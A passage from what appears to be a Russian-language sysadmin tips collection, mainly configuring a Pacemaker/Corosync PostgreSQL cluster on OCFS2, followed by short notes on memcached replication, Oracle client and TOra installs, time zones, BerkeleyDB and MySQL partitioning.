crm_attribute --type crm_config --name cluster-name --update pgclst Параметры по-умолчанию Меняем параметры по-умолчанию для новых ресурсов:
resource-stickiness - "липучесть" ресурса к текущему расположению в кластере (по-умолчанию 0), или "стоимость" переноса ресурса на другой узел. При увеличении значения, pacemaker будет стараться восстановить состояние сбойного ресурса на том же узле, при малом значении - предпочтёт восстановить ресурс запуском на других узлах. root# crm_attribute --type rsc_defaults --name resource-stickiness --update 10
migration-threshold - кол-во сбоев ресурса на узле, при превышении которого происходит миграция на другой узел root# crm_attribute --type rsc_defaults --name migration-threshold --update 2 Ассиметричный кластер Можно указать, что для запуска каких-либо ресурсов необходимо наличие явного разрешающего правила. Это может понадобиться если не все узлы кластера идентичны по характеристикам: root# crm_attribute -n symmetric-cluster -v false После включения для каждого ресурса будет необходимо создать правила. crm conf location <имя правила> <имя ресурса> <приоритет>: <узел> Например, для ресурса виртуального ip-адреса (ip-pgclst) можно указать, что c приоритетом 100 он будет размещаться на узле node1, с приоритетом 10 - на узле node2, а на узле node3 его запуск будет запрещён (приоритет -infinity ): root~# crm conf crm(live)configure# location loc-ip-1 ip-pgclst 100: node1 crm(live)configure# location loc-ip-2 ip-pgclst 10: node2 crm(live)configure# location loc-ip-3 ip-pgclst -inf: node3 Изоляция узлов (stonith) В Pacemaker для каждого узла необходимо указать метод изоляции (fencing) в случае сбоя сетевой доступности. Осуществляется изоляция с помощью stonith ресурсов. Это могут быть программы для отключения питания на UPS, программы, которые подключаются к гипервизору и принудительно завершают работу виртуальной машины (нашего узла кластера) и много других вариантов. Без STONITH устройств Pacemaker откажется запускать ресурсы: root:~# crm_verify -L -V (unpack_resources) error: Resource start-up disabled since no STONITH resources have been defined (unpack_resources) error: Either configure some or disable STONITH with the stonith-enabled option (unpack_resources) error: NOTE: Clusters with shared data need STONITH to ensure data integrity Errors found during check: config not valid Список устройств для изоляции можно узнать из команды: root# stonith_admin --list-installed Параметры, необходимые устройству для работы, можно узнать: root# stonith -t <имя устройста stonith> -n Простейшие stonith ресурсы можно создать так. Ресурс-пустышка dummy - ничего не отключает: root# crm conf primitive sh-dummy stonith:null params hostlist="192.168.1.11 192.168.1.12 192.168.1.13" root# crm conf clone fency sh-dummy SSH-stonith - пытается подключиться к сбойному узлу через SSH и запланировать выключение через службу at (должна быть установлена на всех узлах). root# apt install at root# crm conf primitive fence-ssh stonith:ssh params hostlist="192.168.1.11 192.168.1.12 192.168.1.13" root# crm conf clone fency fence-ssh Имитируем сбой на узле node3: root# stonith -t ssh -p "node1 node2 node3" -T reset node3 Для тестирования может понадобится отключение STONITH (НЕ РЕКОМЕНДУЕТСЯ): root~# crm_attribute -n stonith-enabled -v false Очистить ошибки можно командой: root# stonith_admin --cleanup --history=node3 Стоит заметить что, в случае сбоя сети, кроме STONITH устройств, узел кластера может перезагрузить служба OCFS2. Если у какого-либо узла пропадёт связь с другими узлами, но он продолжит посылать heartbeat сообщения на кластерный диск, то через 30 секунд (значение sysctl kernel.panic = 30) этот узел будет перезагружен принудительно. Настройка PostgreSQL для работы под управлением Pacemaker/Corosync Для запуска PostgreSQL необходимо создать три ресурса:
Ресурс, который будет монтировать ФС, где расположена БД
Ресурс виртуального ip-адреса, по которому будут обращаться клиенты к СУБД
Ресурс, запускающий процессы СУБД PostgreSQL После необходимо настроить правила совместного расположения ресурсов и указать порядок запуска. В примере будет созданы ресурсы, обеспечивающие работу экземпляра СУБД. Ресурс, обеспечивающий монтирование ФС с БД Описание ресурса Pacemaker для ФС OCFS2 Ресурс fs-ocfs2 будет монтировать кластерную ФС OCFS2 в каталог /mnt/ocfs2clst на каждом узле. Монтирование будет производится по метке ФС. Том, где расположена БД, у меня имеет UUID метку ce92b1e7-30cb-4883-9a92-57c986f76acd (см. Создание ФС OCFS2). root~# mkdir -p /mnt/ocfs2clst # выполнить на каждом узле root@node1:~# crm conf crm(live/node1)configure# primitive fs-ocfs2 Filesystem \ params device="/dev/disk/by-uuid/ce92b1e7-30cb-4883-9a92-57c986f76acd" \ directory="/mnt/ocfs2clst" \ fstype=ocfs2 options="rw,relatime,commit=5,coherency=buffered" \ op start timeout=60s interval=0 \ op stop timeout=60s interval=0 \ op monitor timeout=40 interval=20 Полный список параметров монтирования можно узнать на странице https://www.kernel.org/doc/html/latest/filesystems/ocfs2.html По-умолчанию, ресурс запускается только на одном узле, но так как у нас ФС кластерная, необходимо запустить ресурс на всех узлах. Это возможно с помощью клона ресурса: crm(live/node1)configure# clone fs-clone-ocfs2 fs-ocfs2 Проверяем конфигурацию и выходим: crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit После создания ресурса, ФС должна автоматически смонтироваться на всех узлах кластера. root@node1:~# mounted.ocfs2 -f Device Stack Cluster F Nodes /dev/vdb o2cb ocfs2clst node1, node3, node2 Правила размещения ресурса на узлах Если указан параметр symmetric-cluster=false, то для запуска ресурсов необходимо указать явные правила, где ресурсы могут запускаться. Указываем, что ресурс кластерной ФС должен запускаться на всех узлах кластера с равным приоритетом 1: root~# crm conf crm(live)configure# location loc-fs-ocfs2-1 fs-clone-ocfs2 1: node1 crm(live)configure# location loc-fs-ocfs2-2 fs-clone-ocfs2 1: node2 crm(live)configure# location loc-fs-ocfs2-3 fs-clone-ocfs2 1: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно. Ресурс виртуального ip-адреса Создаём ресурс ip-pgclst виртуального ip-адреса 192.168.1.10. Именно этот ip-адрес будет использовать СУБД для приёма подключений. root~# crm conf crm(live)configure# primitive ip-pgclst IPaddr \ params ip=192.168.1.10 \ op monitor interval=10s Если в атрибутах кластера Pacemaker указан параметр symmetric-cluster=false, то аналогично ресурсу файловой системы создаём правила размещения. Ресурс ip-адреса будет располагаться совместно с СУБД. Если производительность узлов отличается, то можно указать разные приоритеты для запуска. Предположим, что node1 мощнее, чем node2, а node3 вообще исключим для работы СУБД: root~# crm conf crm(live)configure# location loc-ip-pgclst-1 ip-pgclst 100: node1 crm(live)configure# location loc-ip-pgclst-2 ip-pgclst 10: node2 crm(live)configure# location loc-ip-pgclst-3 ip-pgclst -inf: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно. У меня в примере правила размещения не используются. Ресурс Pacemaker, запускающий процессы СУБД PostgreSQL Инициализация файлов кластера БД PostgreSQL Изменяем владельца и права доступа на каталог с БД: root# chown -R postgres:postgres /mnt/ocfs2clst root# chmod 750 /mnt/ocfs2clst Инициализируем файлы кластера БД PostgreSQL в каталоге /mnt/ocfs2clst/pg-data с включением контроля чётности страниц БД, а после запускаем СУБД: postgres@node1:~$ /usr/lib/postgresql/13/bin/initdb -D /mnt/ocfs2clst/pg-data/ -A peer -k postgres@node1:~$ /usr/lib/postgresql/13/bin/pg_ctl -D /mnt/ocfs2clst/pg-data/ start Настройка конфигурации PostgreSQL Подключаемся к СУБД через unix-сокет: root@node1:~# su - postgres postgres@node1:~$ psql Изменяем параметры БД для возможности работы под управлением Pacemaker: psql> alter system set logging_collector=on; psql> alter system lc_messages = 'C.UTF-8'; psql> alter system set listen_addresses='192.168.1.10'; Здесь я включил сборщик сообщений (logging collector), поменял язык сообщений на английский (при работе по Pacemaker, русские сообщения заменялись вопросами) и указал, что СУБД должна принимать соединения только на кластерном ip-адресе. Если потребуется в кластере Pacemaker запустить несколько экземпляров Postgresql, то необходимо разместить unix-сокет СУБД по отдельным каталогам, так как по-умолчанию все экземпляры будут создавать сокет в каталоге /tmp. psql> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-data'; Например, если бы у нас было две БД: СУБД 1, кластерный ip 192.168.1.21, каталог /mnt/ocfs2clst/pg-db1 СУБД 2, кластерный ip 192.168.1.22, каталог /mnt/ocfs2clst/pg-db2 то unix_socket_directories необходимо задать: psql db1> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-db1'; psql db2> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-db2; В дальнейшем для подключения через unix-сокет необходимо указать путь к нему (команду необходимо выполнять на том узле, где работает СУБД): postgres@node1:~$ psql -h /mnt/ocfs2clst/pg-data/ Редактируем файл /mnt/ocfs2clst/pg-data/pg_hba.conf, разрешаем подключение по сети с паролем: ... # IPv4 network connections host all all all md5 ... После внесения настроек, останавливаем СУБД: postgres@node1:~$ /usr/lib/postgresql/13/bin/pg_ctl -D /mnt/ocfs2clst/pg-data/ stop Создание ресурса СУБД PostgreSQL root~# crm configure crm(live/node1)configure# primitive db-pgclst pgsql \ params pgctl="/usr/lib/postgresql/13/bin/pg_ctl" \ psql="/usr/lib/postgresql/13/bin/psql" \ pgdba=postgres \ pglibs="/usr/lib/postgresql/13/lib" \ pgdata="/mnt/ocfs2clst/pg-data" \ socketdir="/mnt/ocfs2clst/pg-data" \ config="/mnt/ocfs2clst/pg-data/postgresql.conf" \ op start timeout=120s interval=0 \ op stop timeout=120s interval=0 \ op monitor timeout=30 interval=30 Значения параметра socketdir в описании ресурса Pacemaker должно совпадать с параметром unix_socket_directories в файле конфигурации PostgreSQL postgresql.conf/postgresql.auto.conf. Правила размещения ресурса на узлах Аналогично ресурсу ip-адреса, если в атрибутах указан параметр symmetric-cluster=false, то создаём правила размещения ресура: root~# crm conf crm(live)configure# location loc-db-pgclst-1 db-pgclst 100: node1 crm(live)configure# location loc-db-pgclst-2 db-pgclst 10: node2 crm(live)configure# location loc-db-pgclst-3 db-pgclst -inf: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно, тогда СУБД сможет запускаться на любом из узлов, при условии, что ресурсу ip-адреса так же разрешен запуск на всех узлах. У меня в примере правила размещения не используются. Правила, описывающие совместное расположение ресурсов Необходимо, чтобы виртуальный ip-адрес и экземпляра СУБД PostgreSQL располагались на одном узле, иначе СУБД не запустится. crm conf colocation <имя правила> <приоритет>: <ресурс1> <ресурс2> Для этого создаём соответствующее правило: root~# crm conf crm(live/node1)configure# colocation col-ip-pgsql inf: ip-pgclst db-pgclst crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit Правила, описывающие порядок запуска ресурсов Необходимо, чтобы ресурс виртуального ip-адреса и ресурс, монтирующий кластерную ФС OCFS2, запускались раньше ресурса СУБД PostgreSQL. crm conf order <имя правила> <приоритет>: <ресурс1> <ресурс2> Для этого создаём соответсвующие правила: root~# crm conf crm(live/node1)configure# order ord-fs-pgsql Mandatory: fs-clone-ocfs2 db-pgclst crm(live/node1)configure# order ord-ip-pgsql Mandatory: ip-pgclst db-pgclst crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit Проверка работы После настройки ресурсов проверяем, что все они запущены с помощью команды crm_mon: root@node1:~# crm_mon -nr1 Cluster Summary: * Stack: corosync * Current DC: node3 (version 2.0.5-ba59be7122) - partition with quorum * Last updated: Sat Jul 16 18:04:00 2022 * Last change: Sat Jul 16 10:52:30 2022 by root via cibadmin on node2 * 3 nodes configured * 8 resource instances configured Node List: * Node node1: online: * Resources: * fs-ocfs2 (ocf::heartbeat:Filesystem): Started * sh-dummy (stonith:null): Started * Node node2: online: * Resources: * sh-dummy (stonith:null): Started * fs-ocfs2 (ocf::heartbeat:Filesystem): Started * db-pgclst (ocf::heartbeat:pgsql): Started * ip-pgclst (ocf::heartbeat:IPaddr): Started * Node node3: online: * Resources: * sh-dummy (stonith:null): Started * fs-ocfs2 (ocf::heartbeat:Filesystem): Started Inactive Resources: * No inactive resources Из вывода видно, что СУБД запущена на узле node2. Подключимся к нему через ssh и создадим пользователя в Postgresql: user@pc:~$ ssh user@192.168.1.12 user@node2:~$ sudo su - postgres postgres@node2:~$ psql -h /mnt/ocfs2clst/pg-data/ postgres=# create role pguser login encrypted password 'пароль'; postgres=# \q Проверяем подключение к СУБД с клиента: user@pc:~$ psql -h 192.168.1.10 -U pguser postgres postgres=> select count(*) from pg_settings; count ------- 308 (1 строка) С любого узла кластера перемещаем СУБД на другой узел: root@node1:~# crm_resource --move -r db-pgclst -H node1 или с помощью CRM Shell root@node1:~# crm resource move db-pgclst node1 Определяем где запущен ресурс: root@node1:~# crm_resource -W -r db-pgclst resource db-pgclst is running on: node1 Выполняем повторный запрос с клиента: postgres=> select count(*) from pg_settings; FATAL: terminating connection due to administrator command сервер неожиданно закрыл соединение Скорее всего сервер прекратил работу из-за сбоя до или в процессе выполнения запроса. Подключение к серверу потеряно. Попытка восстановления удачна. psql (14.1, сервер 13.7 (Debian 13.7-0+deb11u1)) postgres=> select count(*) from pg_settings; count ------- 308 (1 строка) Как видно, при перемещении ресурса все соединения с СУБД закрылись, но повторный sql-запрос выполнился успешно. Команды перемещения ресуров crm_resource --move или crm resource move на самом делее создают в базе Pacemaker CIB запись: <rsc_location id="cli-prefer-db-pgclst" rsc="db-pgclst" role="Started" node="node1" score="INFINITY"/> Эта запись указывает в дальнейшем запускать ресурс db-pgclst на узле node1. Для того чтобы вернуть возможность запуска ресурса на любом из узлов достаточно выполнить одну из команд: root# crm_resource -r db-pgclst --clear root# crm resource clear db-pgclst Команды управления кластером Pacemaker root# crm_verify -L -V - проверка конфигурации Pacemaker root# crm_mon -rf - отслеживание статуса ресурсов root# crm_resource -W -r db-pgclst - определить расположение ресурса db-pgclst в кластере root# crm node standby - приостановить работу узла root# crm node online - возобновить работу узла root# crm resource status - посмотреть список ресурсов root# crm resource move db-pgclst node2 - мигрировать ресурс ip-pgclst на узел node2 root# crm resource clear db-pgclst - убрать привязку после переноса root# crm resource stop db-pgclst - остановить ресурс db-pgclst root# crm resource start db-pgclst - запустить работу ресурса db-pgclst root# crm resource cleanup db-pgclst или # crm_resource --resource db-pgclst --cleanup - сброс количества ошибок ресурса root# crm configure delete db-pgclst - удаление ресурса root# cibadmin --query > tmp.xml - создать дамп базы Pacemaker CIB

Организация мульти-мастер репликации двух memcached-серверов (доп. ссылка 1) [комментарии]

Для организации автоматической репликации данных между двумя серверами memcached (http://memcached.org/) можно использовать набор патчей http://repcached.lab.klab.org/ . Система поддерживает мульти-мастер режим и реплицирует данные в асинхронном режиме, поддерживаются все команды memcached (set, add, delete, incr/decr, flush_all, cas). Например, используя репликацию удобно организовать синхронизированное хранение в memcached номеров пользовательских сессий, при раздельном обслуживании частей сайта несколькими серверами. Ниже представлен пример настройки двух реплицированных memcached-серверов в Debian/Ubuntu. Для работы memcached в PHP подключаем соответствующий модуль и указываем хранить идентификаторы сессий через него: extension=memcache.so session.save_handler = memcache session.save_path = "tcp://192.168.168.61:11211?persistent=1,tcp://192.168.168.62:11211?persistent=1" При такой конфигурации идентификаторы сессий всегда будут сохраняться сразу на двух узлах memcached. Но у такой схемы есть проблемы: если один узел выйдет из строя или будет перезагружен, все ранее сохраненные номера на этом узле сессий будут потеряны. Автоматизировать синхронизацию данных между несколькими memcached-серверами можно при помощи repcached. При этом репликация производится в прозрачном режиме, пользовательские приложения обращаются только к локальному memcached, а всю работу по репликации выполняет repcached, делая это в асинхронном режиме. 1. Копируем исходные тексты repcached c http://repcached.lab.klab.org/ , дополнительно установив пакет libevent-dev, который понадобиться для сборки: # tar xvf memcached-1.2.8-repcached-2.2.tar # cd memcached-1.2.8-repcached-2.2/ # apt-get install libevent-dev checkinstall Компилируем и устанавливаем в /usr/local/bin/memcached: # ./configure --enable-replication # make Устанавливаем через создание пакета вместо make install # checkinstall Формируем опции для запуска, создаем /etc/default/memcachedrep: DAEMON_ARGS="-m 64 -p 11211 -u root -P /var/run/memcachedrep.pid -d -x 192.168.168.2 -X 11212" где 192.168.168.2 - адрес второго сервера, куда следует реплицировать данные, 11212 - номер порта, который будет использоваться для репликации данных. На втором сервере по аналогии прописываем адрес первого сервера. Создаем скрипт для запуска /etc/init.d/memcachedrep: #! /bin/sh ### BEGIN INIT INFO # Provides: memcached # Required-Start: $syslog # Required-Stop: $syslog # Should-Start: $local_fs # Should-Stop: $local_fs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: memcached - Memory caching daemon replicated # Description: memcached - Memory caching daemon replicated ### END INIT INFO # Author: Marcus Spiegel <marcus.spiegel@gmail.com> PATH=/sbin:/usr/sbin:/bin:/usr/bin DESC="memcachedrep" NAME=memcached DAEMON=/usr/local/bin/$NAME DAEMON_ARGS="--options args" PIDFILE=/var/run/memcachedrep.pid SCRIPTNAME=/etc/init.d/$DESC VERBOSE="yes" # Exit if the package is not installed [ -x "$DAEMON" ] || exit 0 # Read configuration variable file if it is present [ -r /etc/default/$DESC ] && . /etc/default/$DESC # Load the VERBOSE setting and other rcS variables . /lib/init/vars.sh # Define LSB log_* functions. # Depend on lsb-base (>= 3.0-6) to ensure that this file is present. . /lib/lsb/init-functions # # Function that starts the daemon/service # do_start() { start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \ || return 1 start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON -- \ $DAEMON_ARGS \ || return 2 } # # Function that stops the daemon/service # do_stop() { start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE --name $NAME RETVAL="$?" [ "$RETVAL" = 2 ] && return 2 start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 --exec $DAEMON [ "$?" = 2 ] && return 2 # Many daemons don't delete their pidfiles when they exit. rm -f $PIDFILE return "$RETVAL" } # # Function that sends a SIGHUP to the daemon/service # do_reload() { start-stop-daemon --stop --signal 1 --quiet --pidfile $PIDFILE --name $NAME return 0 } case "$1" in start) [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME" do_start case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; stop) [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME" do_stop case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; restart|force-reload) log_daemon_msg "Restarting $DESC" "$NAME" do_stop case "$?" in 0|1) do_start case "$?" in 0) log_end_msg 0 ;; 1) log_end_msg 1 ;; # Old process is still running *) log_end_msg 1 ;; # Failed to start esac ;; *) # Failed to stop log_end_msg 1 ;; esac ;; *) #echo "Usage: $SCRIPTNAME {start|stop|restart|reload|force-reload}" >&2 echo "Usage: $SCRIPTNAME {start|stop|restart|force-reload}" >&2 exit 3 ;; esac exit 0 Тестируем: На первом узле помещаем ключ в хранилище: $ telnet 127.0.0.1 11211 set foo 0 0 3 bar STORED На втором узле убеждаемся, что ключи реплицировались успешно: telnet 127.0.0.1 11211 get foo VALUE foo 0 3 bar END Далее перезапускаем один из memcached-серверов и по аналогии проверяем, восстановились ли на нем данные.

Установка интегрированной среды TOra с поддержкой Oracle в Ubuntu 8.10 (доп. ссылка 1) (доп. ссылка 2) Автор: Waster [комментарии]

TOra (http://tora.sourceforge.net) "Toolkit for Oracle" - полноценная IDE для работы с такими СУБД, как Oracle, MySQL, PostgreSQL. Сегодня я поделюсь успешным опытом установки TOra c поддержкой Oracle на Ubuntu 8.10. По умолчанию, в пакет из репозитория не включена поддержка Oracle (что для меня очень и очень странно), поэтому пришлось пересобирать пакет. Подготовка Устанавливаем необходимые для сборки пакеты sudo apt-get install libqt3-mt-dev libqt3-compat-headers libqscintilla-dev build-essential \ g++ gcc autoconf automake flex zlib1g-dev docbook-xsl debhelper alien libaio1 dpatch Установка клиента Oracle Скачиваем нужные RPM-пакеты с http://www.oracle.com/technology/software/tech/oci/instantclient/htdocs/linuxsoft.html Нам понадобятся oracle-instantclient11.1-basic-11.1.0.7.0-1.i386.rpm, oracle-instantclient11.1-sqlplus-11.1.0.7.0-1.i386.rpm, oracle-instantclient11.1-devel-11.1.0.7.0-1.i386.rpm Устанавливаем клиент sudo alien -i oracle-instantclient11.1-basic-11.1.0.7.0-1.i386.rpm sudo alien -i oracle-instantclient11.1-sqlplus-11.1.0.7.0-1.i386.rpm sudo alien -i oracle-instantclient11.1-devel-11.1.0.7.0-1.i386.rpm Делаем видимыми библиотеки sudo echo /usr/lib/oracle/11.1/client/lib > /etc/ld.so.conf.d/oracle.conf sudo ldconfig Переменные окружения Устанавливаем переменные окружения и добавляем их в .profile export ORACLE_HOME=/usr/lib/oracle/11.1/client export LD_LIBRARY_PATH=/usr/lib/oracle/11.1/client/lib export TNS_ADMIN=/usr/lib/oracle/11.1/client echo "export ORACLE_HOME=/usr/lib/oracle/11.1/client" >> ~/.profile echo "export LD_LIBRARY_PATH=/usr/lib/oracle/11.1/client/lib" >> ~/.profile echo "export TNS_ADMIN=/usr/lib/oracle/11.1/client" >> ~/.profile Сборка TOra Сохраняем исходники apt-get source tora cd tora-1.x.xx В файле debian/rules находим строчку (или аналогичную) ./configure --prefix=/usr --without-oracle --without-rpath --disable-new-check --with-kde \ --enable-libsuffix= --infodir=/usr/share/info и меняем ее на ./configure --prefix=/usr --with-instantclient --with-oracle-includes=/usr/include/oracle/11.1/client \ --without-kde --without-rpath --disable-new-check --enable-libsuffix= --infodir=/usr/share/info Если кому хочется с KDE, то поможет ключик --with-kde. Собираем и устанавливаем TOra debian/rules binary cd .. sudo dpkg -i tora_1.x.xx-x_i386.deb Не забываем положить tnsnames.ora в TNS_ADMIN, и можно запускать TOra.

Сравнение таблиц на удаленных серверах PostgreSQL Автор: Тормал [комментарии]

Пришлось придумать как сравнить довольно таки объемные таблицы на предмет одинаковости данных в заданном поле. Сравнивать построчно слишком долго и накладно таскать эти объемы по сети. Выход посчитать md5 сумму по колонке для всех значений. Для этого выбираем поле по которому будем сравнивать, поле должно быть независимым от серверов. Делаем из него blob, и считаем md5. Пример: есть таблица A и поле B. select md5(array_send(array(select B from A order by 1))) as md5; после это сравнив md5 суммы с обоих серверов можно утверждать об одинаковости набора данных.

Изменение текущего часового пояса в MySQL, PostgreSQL и в скриптах [комментарии]

MySQL: Посмотреть список глобального и локального часового пояса: SHOW VARIABLES LIKE '%time_zone%'; Конвертация в запросе времени из одной временной зоны в другую: SELECT CONVERT_TZ('2008-10-24 5:00:00','UTC','MSK'); Изменить текущую зону для локального соединения: SET time_zone = 'MSK' или SET time_zone = '+03:00'; Для всего MySQL сервера часовой пояс можно поменять установив в файле конфигурации: default-time-zone='MSK' или под привилегированным пользователем выполнить запрос: SET GLOBAL time_zone ='MSK' PostgreSQL: Для текущей сессии зона задается через: SET TIME ZONE 'MSK' или SET TIME ZONE '-3' Для клиентов использующих libpq часовой пояс может быть определен в переменной окружения PGTZ. Если часовой пояс для всей СУБД не определен (параметр timezone) в postgresql.conf, он берется из стандартной переменной окружения TZ в shell: export TZ=GMT-3 в perl: $ENV{"TZ"}="GMT-3"; в PHP: putenv("TZ=GMT-3");

Установка клиента Oracle в Solaris без использования графического интерфейса (доп. ссылка 1) Автор: Kovalchuk Egor [обсудить]

На официальном сайте Oracle присутствует небольшое руководство по установке в Solaris без использования графического интерфейса, при этом оно сводится к тому, что нужно запустить скрипт под графическим интерфейсом с дополнительными параметрами. /directory_path/runInstaller -record -destinationFile response_filename В итоге получаем файл, который может быть использован при установке, но установка графического интерфейса была не приемлема, поэтому пришлось разбираться самому с файлом ответов. Для установки нужно скачать клиента с оф. сайта Oracle. скачать можно по адресу: http://download-llnw.oracle.com/otn/solaris/oracle10g/10201/sol64/10gr2_client_sol.cpio.gz создайте пользователя и группу для клиента например: useradd oracle groupadd oracle usermod -g oracle oracle passwd oracle Создайте папку распакуйте полученный архив в эту папку и дайте команду chown -R oracle:oracle /directory_path/ Теперь нужно править или создать свой фаил ответов версию можем не трогать RESPONSEFILE_VERSION=2.2.1.0.0 имя группы которую создали для оракла UNIX_GROUP_NAME="oracle" если вы брали стандартый дистрибутив с сайта менять не надо FROM_LOCATION="../stage/products.xml" имя и путь к следующему фаилу ответов NEXT_SESSION_RESPONSE="" Куда устанавливаем ORACLE_HOME="/export/home/oracle/client" ORACLE_HOME_NAME="OraClient" эти значения нужно оставить по молчанию. Беруться из примеров файлов ответов в дистрибутиве TOPLEVEL_COMPONENT={"oracle.client","10.2.0.1.0"} DEINSTALL_LIST={"oracle.client","10.2.0.1.0"} т.к. у нас тихая инсталяция а эти параметры требуют графический интерфейс скидываем их все в false SHOW_SPLASH_SCREEN=false SHOW_WELCOME_PAGE=false SHOW_CUSTOM_TREE_PAGE=false SHOW_SUMMARY_PAGE=false SHOW_INSTALL_PROGRESS_PAGE=false SHOW_CONFIG_TOOL_PAGE=false SHOW_XML_PREREQ_PAGE=false SHOW_ROOTSH_CONFIRMATION=true SHOW_END_SESSION_PAGE=false SHOW_EXIT_CONFIRMATION=false SHOW_DEINSTALL_CONFIRMATION=false SHOW_DEINSTALL_PROGRESS=false следующая сессия нам не нужна поэтому скидываем параметры в false NEXT_SESSION=false NEXT_SESSION_ON_FAIL=false CLUSTER_NODES={} какую папку удалить после установки REMOVE_HOMES="" выбор поддержки языка COMPONENT_LANGUAGES={"en"} тип исталяции INSTALL_TYPE="Administrator" если используется тип инсталяции Custom нужно добавить еще один параметр, где перечисляются нужные компоненты DEPENDENCY_LIST={"oracle.sqlj:10.2.0.1.0","oracle.rdbms.util:10.2.0.1.0", "oracle.javavm.client:10.2.0.1.0","oracle.sqlplus:10.2.0.1.0", "oracle.dbjava.jdbc:10.2.0.1.0","oracle.ldap.client:10.2.0.1.0", "oracle.rdbms.oci:10.2.0.1.0","oracle.precomp:10.2.0.1.0","oracle.xdk:10.2.0.1.0", "oracle.swd.opatch:10.2.0.1.0","oracle.network.aso:10.2.0.1.0","oracle.oem.client:10.2.0.1.0", "oracle.oraolap.mgmt:10.2.0.1.0","oracle.network.client:10.2.0.1.0","oracle.ordim.client:10.2.0.1.0", "oracle.ons:10.1.0.3.0","oracle.has.client:10.2.0.1.0"} после того как готов файл, залогиниваемся под пользователем клиента и запускаем команду /directory_path/runInstaller -silent -responseFile responsefilename снова перелогиниваемся под рутом и запускаем скрипт root.sh, который лежит в папке с установленным клиентом Установка прошла успешно А дальше пользуемся готовыми статьями по настройке подключений. P.S. возможны проблемы, когда некоторые фалы копируются битыми, просто перезапустите скрипт утановки.

Как организовать выборку ключа по условию больше или равно в BerkeleyDB [обсудить]

Задача: выбрать запись с ключем большим или равным искомому, т.е. организовать выборку по промежутку значений: #!/usr/bin/perl use strict; use BerkeleyDB; use constant DB_DEF_CACHE_SIZE => 5000000; my %hash; my $dbobj = tie(%hash, 'BerkeleyDB::Btree', -Filename => "test.db", -Cachesize => DB_DEF_CACHE_SIZE, -Flags => DB_CREATE, -Compare => sub { $_[0] <=> $_[1] } ) or die "Can't create or open DB File!\n"; # Тестовые значения $hash{5}="0-5"; $hash{8}="6-8"; $hash{20}="9-20"; $hash{80}="21-80"; my ($key, $val); my $cursor = $dbobj->db_cursor(); # Выборка. $key=3; $cursor->c_get($key, $val, DB_SET_RANGE); print "3=$val\n"; $key=25; $cursor->c_get($key, $val, DB_SET_RANGE); print "25=$val\n"; $key=80; $cursor->c_get($key, $val, DB_SET_RANGE); print "80=$val\n"; untie %hash;

Как сохранить данные в базе данных в сжатом виде. (доп. ссылка 1) [комментарии]

Для MySQL есть утилита myisampack или самое простое, своими силами данные, перед помещением в базу, сжимать и разжимать (функции COMPRESS() и UNCOMPRESS()). В PostgreSQL для хранения текстовой информации в сжатом виде предусмотрен тип данных "lztext". Можно сжатие данных возложить на плечи файловой системы, для linux и freebsd есть возможности для прозрачного сжатия.

Типы хранилищ и возможности Berkeley DB [комментарии]

Berkeley DB позволяет эффективно организовать хранилище пар вида ключ/значение. Типы хранилища: Hash - хэш, выборка по точному значению Btree - сбалансированное дерево, выборка по точному значению или >=. Recno - для хранения индексированных массивов. Queue - оптимизировано для очередей, где чаще всего запрашивают элементы верхушки или низа. В версиях от 2 и выше, поддерживаются средства одновременного апдейта базы, локов, транзакций, "курсоров", восстановления поврежденного хранилища.

Как в SQL запросе осуществить преобразование время минус число. [обсудить]

mytime - timestamp поле myint - integer поле SELECT mytime - interval (myint) FROM sometable;

маленькая заметка к возрастающим ключам Автор: Yuri A. Kabaenkov [обсудить]

в последних версиях pgsql существует тип данных serial которой автоматически создает последовательность. тоесть CREATE TABLE test ( a serial );

MySQL специфика

Оптимизация и администрирование MySQL

Использование разделов MySQL для разбиения таблицы по дням месяцам и годам Автор: gara [комментарии]

Приходится иметь дело с таблицами, которые содержат редко (или никогда) обновляемые данные, такие как логи. Некоторые таблицы чистятся, некоторые хранят записи "вечно". Чтобы уменьшить нагрузку на диск и ФС, придумали такую вещь как partitioning (Cекционирование). Часто необходимо резать таблицу на partition по году по месяцу или по дням месяца/недели. Что-то подсказывает что резать придется по полю типа timestamp. Сделаем табличку CREATE TABLE `foo` ( `id` int(11) NOT NULL AUTO_INCREMENT, `date_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `name` varchar(30) DEFAULT NULL, `email` varchar(30) DEFAULT NULL, PRIMARY KEY (`id`) ); и попробуем порезать ее по годам ALTER TABLE foo PARTITION BY RANGE (YEAR(date_added)) ( PARTITION p2011 VALUES LESS THAN (2012) , PARTITION p2012 VALUES LESS THAN (2013) , PARTITION p2013 VALUES LESS THAN (2014) ); получаем: ERROR 1486 (HY000): Constant, random or timezone-dependent expressions in (sub)partitioning function are not allowed объяснения этому вот какое: "TIMESTAMP is internally converted to the local sessions timezone." ладно: SELECT UNIX_TIMESTAMP('2012-01-01 00:00:00'); +---------------------------------------+ | UNIX_TIMESTAMP('2012-01-01 00:00:00') | +---------------------------------------+ | 1325361600 | +---------------------------------------+ SELECT UNIX_TIMESTAMP('2013-01-01 00:00:00'); = 1356984000 SELECT 